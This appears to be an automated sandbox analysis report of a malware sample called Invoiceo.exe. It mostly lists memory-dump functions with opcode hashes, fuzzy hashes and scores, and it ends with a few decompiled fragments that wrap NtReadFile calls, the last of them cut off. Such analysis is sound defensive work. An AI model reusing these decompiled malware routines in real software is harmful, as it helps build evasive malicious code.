Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba23190f4d595ffc94b0e0da20f07c951449966ebcfc585779886ed46aed72f
Instruction ID: caf713301a7fdbff0889eda4c4291bc5f3927af4662badee00d4c8a8890a4bc4
Opcode Fuzzy Hash: 9ba23190f4d595ffc94b0e0da20f07c951449966ebcfc585779886ed46aed72f
Instruction Fuzzy Hash: 8E01E5392406108FC368CF38D898C66BBB2FF8932571645A9E956CB372CB71EC45CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00C91B00, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bec56a6b85e029b3e5f5e5602bb5c8b2c96ef1934247327d4ee2a43fe636ae4e
Instruction ID: 1c51190e4d39d39111f1d14173c9a6e72cd1eebf8ae00d14daf27ebcb867d4c4
Opcode Fuzzy Hash: bec56a6b85e029b3e5f5e5602bb5c8b2c96ef1934247327d4ee2a43fe636ae4e
Instruction Fuzzy Hash: 73F02476B083441FD711D739AC818ABBBEAEFC5220305442AE449C7B01EE60FC0683A1

Uniqueness

Uniqueness Score: -1.00%

Function 00C49238, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d5b873d071dea2d71f7bc538f4cac999b79ccd12b32901b80166ae8e46b2bc2
Instruction ID: 55194fd9c260a0988bfb67bf1ff59a045330bd2b6a3cfc31a8a2b1af3772644e
Opcode Fuzzy Hash: 2d5b873d071dea2d71f7bc538f4cac999b79ccd12b32901b80166ae8e46b2bc2
Instruction Fuzzy Hash: CEF08C71E05254AFD714CBAAC804A5BBBE5EFC9720F01C0EAE919DB2A0DA749D01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C49651, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7852fe7df976d146cbf638fd9bd16e9b424c220fee58bb67bfa634cf80563ab
Instruction ID: 196cf5f083afeb229ec9cc4abf2300ccc2642d1d86090912de5fc5af01d255c4
Opcode Fuzzy Hash: c7852fe7df976d146cbf638fd9bd16e9b424c220fee58bb67bfa634cf80563ab
Instruction Fuzzy Hash: 85F06D35304100AFC3049B6AC885E57BBE9EF89760F1580A5F50DCB761CB31EC01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C43881, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2e58099dee75fda601540cfebf1256a740a8f61acc9bafa57631bcfe7eec75c
Instruction ID: 3c3ed9652b53694dd4198d76a3f136c8e8fa10a0d20c30b0391b6d9399b98330
Opcode Fuzzy Hash: c2e58099dee75fda601540cfebf1256a740a8f61acc9bafa57631bcfe7eec75c
Instruction Fuzzy Hash: 91F0B431F042948BDB34A67A58055AEE792ABC5350B15463BE915D72C5E7704A019641

Uniqueness

Uniqueness Score: -1.00%

Function 00C4885B, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b86fcc3caeff70b34e7ffa449a4c99aa32eca2eba0c82bb94b98fc212cb72a5e
Instruction ID: f3864cba9e9268c27fbc593ad5fadfa38c67cf632397bb8f4d0a7eeeae345a54
Opcode Fuzzy Hash: b86fcc3caeff70b34e7ffa449a4c99aa32eca2eba0c82bb94b98fc212cb72a5e
Instruction Fuzzy Hash: DBF09031B00204AFDB14CA5AC804B5AB7E6EFC5B20F1180AAE519D7290DE30AD01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00C9E75A, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d487b9ffeea8544129a1c4c4b3d2b2b84a02d0e4196756009f112b555bb9796f
Instruction ID: d4c880c410523304bc6e90fc435b5346d74fd7223e743bfff0ac363b2f0f4443
Opcode Fuzzy Hash: d487b9ffeea8544129a1c4c4b3d2b2b84a02d0e4196756009f112b555bb9796f
Instruction Fuzzy Hash: BEF024713042508FDB22DB69A844A7FBBE6EB89320B00063EF149C7791CB705D028390

Uniqueness

Uniqueness Score: -1.00%

Function 00C9FD09, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32094862d7be24fa5da7bb94b82a9d19ed257755cdcfc4c18580c9945d4a6f9d
Instruction ID: ddf9aa4a6e0659f1a57531b7c81bc7187a919024c2752803b126f77590017ab9
Opcode Fuzzy Hash: 32094862d7be24fa5da7bb94b82a9d19ed257755cdcfc4c18580c9945d4a6f9d
Instruction Fuzzy Hash: BDF082313093955FCA0A1B75A41D1EDBF95EBC1724B04015AE44587782CF39690983E9

Uniqueness

Uniqueness Score: -1.00%

Function 00C49660, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4c59e2ecef62d0e22963101a7b89f4aa414517d222db08190ba8ef7f0c21caa
Instruction ID: 4bb446acb54535bb530ca3128c278ce2f53d2e9c63674bff0e322921c0216fe6
Opcode Fuzzy Hash: e4c59e2ecef62d0e22963101a7b89f4aa414517d222db08190ba8ef7f0c21caa
Instruction Fuzzy Hash: DFF05E35300410AFC3109A5EC884E57BBDAEFC9760B158065F509CB761CA31EC0186A0

Uniqueness

Uniqueness Score: -1.00%

Function 00C91B10, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63acd5ec968bfacf5bd8eb265f0f7f46633d2f55a0f283f0719dc5552b6ccc78
Instruction ID: bcfc55bf00528c64812bb73fa9562609e415ac8ae301d731172a1b942e5d80b8
Opcode Fuzzy Hash: 63acd5ec968bfacf5bd8eb265f0f7f46633d2f55a0f283f0719dc5552b6ccc78
Instruction Fuzzy Hash: AAF03035B043055F5714E66AAC8196BF7EEEBC42643144929E549D3704EE71FC0587A0

Uniqueness

Uniqueness Score: -1.00%

Function 00C9FEA1, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52744b6ccceb5f3e86fc2af1886ead63aed88a5cfbaa919dbb79b92ab8c7a9d8
Instruction ID: 4db7f28866f59ec4ba1876bd4e03e4a9b392d2cb4a4a8771286dff9a5c837b53
Opcode Fuzzy Hash: 52744b6ccceb5f3e86fc2af1886ead63aed88a5cfbaa919dbb79b92ab8c7a9d8
Instruction Fuzzy Hash: FCF0A031148188EFEB454BA5A80D6AA3F30AB25304F30002FF106C94F3C62986A3AB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C9A9E1, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e07c46369b8cd07618b2f64e6b75850b0bbf65f1547405f3211424b15aab5d62
Instruction ID: 822f6c685091c3173273e7be711071cf36500122f0c481beea44952f8d3dc905
Opcode Fuzzy Hash: e07c46369b8cd07618b2f64e6b75850b0bbf65f1547405f3211424b15aab5d62
Instruction Fuzzy Hash: A6F030B644D3C46FE7039FA09C15E657F66AF17210F05818AFAC54A1F3C3654960E771

Uniqueness

Uniqueness Score: -1.00%

Function 00C966E0, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 903afecdc9123bd2e22a253e1263437d319f0c124a3fb3789bd26e06fe86d680
Instruction ID: 2ceb9f90012f3c0f0e8bb01a005fe037695635a5b720f98a303f54c810f9a049
Opcode Fuzzy Hash: 903afecdc9123bd2e22a253e1263437d319f0c124a3fb3789bd26e06fe86d680
Instruction Fuzzy Hash: CDE0D83A60421187DB2529789420655BBD09BD5735B16427AD8E8C63D0DA75CD42C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00C9FAD7, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41be09fd2185819c544dd4bbc0b790351c72d3a88f8b04b223932d7e3fbda606
Instruction ID: da0449e332856d763715d256d149919475d5cd89d2d1ee76043702669bed582a
Opcode Fuzzy Hash: 41be09fd2185819c544dd4bbc0b790351c72d3a88f8b04b223932d7e3fbda606
Instruction Fuzzy Hash: 6EE0483595414D9BCB48BBB9F46B0FDBBF4F610211F00016FD51691A819F2515878AC2

Uniqueness

Uniqueness Score: -1.00%

Function 00C49A18, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5263200125a73a07f255be2c9ca884a5812ad0862eb219c53393a9850859fc28
Instruction ID: 302a321f015125b50b4db94cd5d0f331e1cc13e230b57fffabbfe075401bedc7
Opcode Fuzzy Hash: 5263200125a73a07f255be2c9ca884a5812ad0862eb219c53393a9850859fc28
Instruction Fuzzy Hash: 29F0A0302087509FD314DB28D544B927BF1FF45324F458869E0458BAA1C7B0F800CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C9B291, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b48448fa557855290739705f0bdc8de3169e04e5034caeeb9695c4f4783b2900
Instruction ID: 61b96313cbf42ba5e37f999f426e6a102f0415bc6b7f20162306f0f7c7337ec4
Opcode Fuzzy Hash: b48448fa557855290739705f0bdc8de3169e04e5034caeeb9695c4f4783b2900
Instruction Fuzzy Hash: E9F0F270609205EFCF18EFA1EA98A6E77B1BF44304F204418E5029B3A5DF30DD018B81

Uniqueness

Uniqueness Score: -1.00%

Function 00C9FBA1, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 318a73973151debe9e81ad16ca00b477813bd8f3cbc0c266cbf6a9a01d49dc24
Instruction ID: 170ced6db4d739323325fa2f0a14a7328081545e5e80f636e121619bbe4850a0
Opcode Fuzzy Hash: 318a73973151debe9e81ad16ca00b477813bd8f3cbc0c266cbf6a9a01d49dc24
Instruction Fuzzy Hash: 85E01A75A0424ACFC7449BA5E4474BEBBF4FB44311B10412ADD0592780DB352851CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00C9C5BF, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fbcdfeea616b78a3771dd72f68a0c15f96a45933e28c1101bee1751f7de9253
Instruction ID: bffca069bc2c5c31ed02d03de466dabef0235990c63a1e3ebbf56ddb13694f7b
Opcode Fuzzy Hash: 5fbcdfeea616b78a3771dd72f68a0c15f96a45933e28c1101bee1751f7de9253
Instruction Fuzzy Hash: E6F01C75D04248AF9B81DFB9C8459ADBFF4EF09300F6081AAEA58D7221E3349A50CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00C9FD18, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9d45d7a31cad29c7d1077d31cb27db4ba6b23908a9966884c32f49995b728b9
Instruction ID: 21621084c35a26de35e6a3f181d401a21e1cef18fe080f11ed12508a5c5c8973
Opcode Fuzzy Hash: a9d45d7a31cad29c7d1077d31cb27db4ba6b23908a9966884c32f49995b728b9
Instruction Fuzzy Hash: E9E026313046548BCB0D2BB6A41D2BD7E96EBC0729F00002AE40A87380CF3D680A83D9

Uniqueness

Uniqueness Score: -1.00%

Function 00C9FEB0, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8335a6d74b8a7f3104732612f354d93dce65de80e583e2ae31d0d1331a49eac
Instruction ID: 1a6a89f650c8f195aff2585191a35e5a29a3e1ecd3dfad411470b4ff1db97fd6
Opcode Fuzzy Hash: f8335a6d74b8a7f3104732612f354d93dce65de80e583e2ae31d0d1331a49eac
Instruction Fuzzy Hash: E0E04F3110814DEBFF404BE9E84DB993A60B714305F30043AF106C45A2CB65C6B3AB96

Uniqueness

Uniqueness Score: -1.00%

Function 00C9FF11, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f2dcd2f3ddd65ab2a921f428310322347f1b8a72b05b5831238e7ed11270b69
Instruction ID: af622a307908bf82e0a8057aebef9c1adbb5573be7ef55bed362294eb0da34f1
Opcode Fuzzy Hash: 5f2dcd2f3ddd65ab2a921f428310322347f1b8a72b05b5831238e7ed11270b69
Instruction Fuzzy Hash: EBE0ED7090516A8FCB51DFB8C441199BFF0EF0A204B2485AEC508DB212E7728557CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00C9C5D0, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cd9cfad590062affbf1f3ccdb61d1144150378ee445b19abb2985f41919fcea
Instruction ID: 958a23446e50b4b424b7686fa7df11ee5b2cd33a0d512bf1bbb9dfe6fb31a47c
Opcode Fuzzy Hash: 3cd9cfad590062affbf1f3ccdb61d1144150378ee445b19abb2985f41919fcea
Instruction Fuzzy Hash: B0E09AB5D042199F8B80DFB9C9459AEBFF4EB48310F2081A6E958D7221E3319A50DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00C9C590, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ba781dc83e2a1c0737749fc5bdbb87d83c49d810207c28b8bc2cbaccfe98ee1
Instruction ID: 2b109e11a97d9e810e896ea23a6cb71b3971ce5f87e453a41f16f2c031b6fee9
Opcode Fuzzy Hash: 8ba781dc83e2a1c0737749fc5bdbb87d83c49d810207c28b8bc2cbaccfe98ee1
Instruction Fuzzy Hash: 82E02B313047109BD7299756E8086E6B7DBDB88704F048A3DE14647691CAB2FC46C3D0

Uniqueness

Uniqueness Score: -1.00%

Function 00C41D60, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848b37501af141f6bb0f423e77c6d3d00cde29bc89ba9af957067532043e1527
Instruction ID: ccf64b322a9f357b6eecf3b6e314ba1e744cc4a536183941b41238353e0b4b5a
Opcode Fuzzy Hash: 848b37501af141f6bb0f423e77c6d3d00cde29bc89ba9af957067532043e1527
Instruction Fuzzy Hash: C5E01275F19241CFCF2A5BB0582816C7B61FF6230571940AFD9DB89661CB358881CB93

Uniqueness

Uniqueness Score: -1.00%

Function 00C47F80, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e2b4c533d267fcbde34d1b965baca69f62c25f2045c766f7e1589aca1b9b794
Instruction ID: ef25a4f88d71cf90cf16e2699a65ff1c535ab2c185d5205497b70ceba77f72c5
Opcode Fuzzy Hash: 9e2b4c533d267fcbde34d1b965baca69f62c25f2045c766f7e1589aca1b9b794
Instruction Fuzzy Hash: 1CD0A72834A3858FCF1933F1A01D03E36969E8410639940BD9A0ACBA42CF2888064A61

Uniqueness

Uniqueness Score: -1.00%

Function 00C4BA18, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25228b460a96f31e7ef4af0d743b7cc642bb2b3de3d1a44ce2314f9872797b21
Instruction ID: 9d1e60ebcce71d743d4660e8e5ab518b9752dd54dcf7538652dd9c8af7d1aaee
Opcode Fuzzy Hash: 25228b460a96f31e7ef4af0d743b7cc642bb2b3de3d1a44ce2314f9872797b21
Instruction Fuzzy Hash: 0FE0EC32545389BFCF035FA08C51B8A3F32AF06650F154086BA445A0A2C2754479E715

Uniqueness

Uniqueness Score: -1.00%

Function 00C9FF20, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: 2bff449108bb6a694189d3eee69fa6b4fa0b0e2dad65c0f02874d8317e79720b
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: 6CD067B0D042099F8B80EFADC94156EFBF4EB49300F6485BE9919E7301E7329A528BD1

Uniqueness

Uniqueness Score: -1.00%

Function 00C9FAE8, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6aef5449600b55d95d2a940eba8fc84ea5f9beeed88b5cda376c5ae03a3da8c5
Instruction ID: c970985be9e938e02a6753dbe472469d5a2bc9ff0f7d93cc1816a0be37b4b6fa
Opcode Fuzzy Hash: 6aef5449600b55d95d2a940eba8fc84ea5f9beeed88b5cda376c5ae03a3da8c5
Instruction Fuzzy Hash: 94D0623490410D8BCB4CAF75E96B4BD7BB4FB14301F400169D907922909B352656CED1

Uniqueness

Uniqueness Score: -1.00%

Function 00C9FBB0, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 400eefdbeb342a5a136389170a41672a54a122e4ed751d732c1f8e8ea71b303c
Instruction ID: 7bd82de37355d08bf37f300764e62a1aa86695a90ae47fe147a231ab98327b30
Opcode Fuzzy Hash: 400eefdbeb342a5a136389170a41672a54a122e4ed751d732c1f8e8ea71b303c
Instruction Fuzzy Hash: 79D06774E1420D8BCB94EFA9E45B47EBBB5FB44201F104169ED09D3394DB346851CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00C9C58F, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8c87baff2e4af77f3588b0d6ae63d92d6e5676dad6dd8bc899e619e823c46cf
Instruction ID: 7c169bb1a4284ca265f25295bd603c2a24860b1a46c1e7ca927fcb4c2c0dd434
Opcode Fuzzy Hash: a8c87baff2e4af77f3588b0d6ae63d92d6e5676dad6dd8bc899e619e823c46cf
Instruction Fuzzy Hash: D9C0C03100C2500DCB359229BC446F67FC21B80300F090B6FD04F8298081C03D04D350

Uniqueness

Uniqueness Score: -1.00%

Function 00C9AA08, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba50d23dfe62b26a2a902d491b91bc76c80003b45560ffd47541512d826e43b1
Instruction ID: a79404f9c7fa76aed91272af7be415be89a4f312a17edd131851da552602dd96
Opcode Fuzzy Hash: ba50d23dfe62b26a2a902d491b91bc76c80003b45560ffd47541512d826e43b1
Instruction Fuzzy Hash: F5D0CA7200824DBBCF424E91AC05EEA3F2AEB08262F008001FF1844061C3328530BBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00C4BA28, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2b2c0b539883e280d1cee7910982d40be78f9658efd947716acabebf8d86371
Instruction ID: 7c9a36a6d08b9dcd3125619b14c1cd6a764d33ff9c5dcbfa44b04d33f1e4a943
Opcode Fuzzy Hash: a2b2c0b539883e280d1cee7910982d40be78f9658efd947716acabebf8d86371
Instruction Fuzzy Hash: DFD0023614024DBBDF125E81DC02F9A7F2AAB19760F108415FF14191B1C773A571FBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00C47F7C, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fb2bb44b71bc54ddb8a524cead90c4cb0fee12209e02432195d983ee2678d5d
Instruction ID: aeb9f403d3ba1bc6b7f5c1b65bbba7b1c53f472d5349a3697137a424b5a573d2
Opcode Fuzzy Hash: 8fb2bb44b71bc54ddb8a524cead90c4cb0fee12209e02432195d983ee2678d5d
Instruction Fuzzy Hash: D4B01235046309CFAB1C27E2F50F27A3B5CED09605745026CEC1943D0197516D405662

Uniqueness

Uniqueness Score: -1.00%

Function 00C9E740, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bd0f610e47778d7305b392339e7af1ce438122d08129f01620966384207e12f
Instruction ID: b465ec238ced99dab0b7d78d97d5371666f5dadb9bb1bbe06713e270141c1d36
Opcode Fuzzy Hash: 7bd0f610e47778d7305b392339e7af1ce438122d08129f01620966384207e12f
Instruction Fuzzy Hash: 2DB09234042328CF82596B64B404A5CB729BB4020938114E9F80E4BBA2AF36E855CA54

Uniqueness

Uniqueness Score: -1.00%

Function 00C9F3C9, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b55994b5a34b6670021f89abc1d64dba3efc5d8ed5d526bfa4bfb08deafb4b94
Instruction ID: beb4dd92d9b1a31402946821041ac0dfd9baa2b7c8e683e5b6f174d7a75ab742
Opcode Fuzzy Hash: b55994b5a34b6670021f89abc1d64dba3efc5d8ed5d526bfa4bfb08deafb4b94
Instruction Fuzzy Hash: D6B01244E4C2D206F79343380CC13063C860B8304CFC5C89080414F176CF3CC9028212

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: Invoiceo.exe PID: 6872 Parent PID: 6316 Invoiceo.exeCOMMON

Executed Functions

Function 00419DFA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E00419DFA(char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, char _a28, intOrPtr _a32, intOrPtr _a36) {
				intOrPtr _v0;
				void* _t18;
				void* _t27;
				intOrPtr* _t29;
				void* _t31;

				asm("sbb bl, al");
				_t13 = _v0;
				_t29 = _v0 + 0xc48;
				E0041A950(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a28; // 0x414d32
				_t12 =  &_a4; // 0x414d32
				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a8, _a12, _a16, _a20, _a24,  *_t6, _a32, _a36, 0x8b55dcab, _t31, cs); // executed
				return _t18;
			}

0x00419dfa
0x00419e03
0x00419e0f
0x00419e17
0x00419e22
0x00419e3d
0x00419e45
0x00419e49

APIs

NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45

Strings

2MA, xrefs: 00419E22, 00419E30
2MA, xrefs: 00419E3D, 00419E44

Memory Dump Source

Source File: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: 2MA$2MA
API String ID: 2738559852-947276439
Opcode ID: b5e32eafe9fc23e378b2dde052943777b56228734a24058bd1118cc253231d75
Instruction ID: 429e877640b8effaec20f9d45c9d84987ad5eed39c6e1586387404cd89a6ea70
Opcode Fuzzy Hash: b5e32eafe9fc23e378b2dde052943777b56228734a24058bd1118cc253231d75
Instruction Fuzzy Hash: 80F0F9B6200104AFCB14DF89DC80DEB77AAAF8C354F158249BE1DA7241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419E00, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00419E00(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A950(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d32
				_t12 =  &_a8; // 0x414d32
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00419e03
0x00419e0f
0x00419e17
0x00419e22
0x00419e3d
0x00419e45
0x00419e49

APIs

NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45

Strings

2MA, xrefs: 00419E22, 00419E30
2MA, xrefs: 00419E3D, 00419E44

Memory Dump Source

Source File: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: 2MA$2MA
API String ID: 2738559852-947276439
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: e2eeafcdabc96c90d19f56ab9cfe9238ee24689222a5818d11d4b5cf4f7c0d6d
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 90F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158649BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419D4C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419D4C(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t22;
				void* _t32;

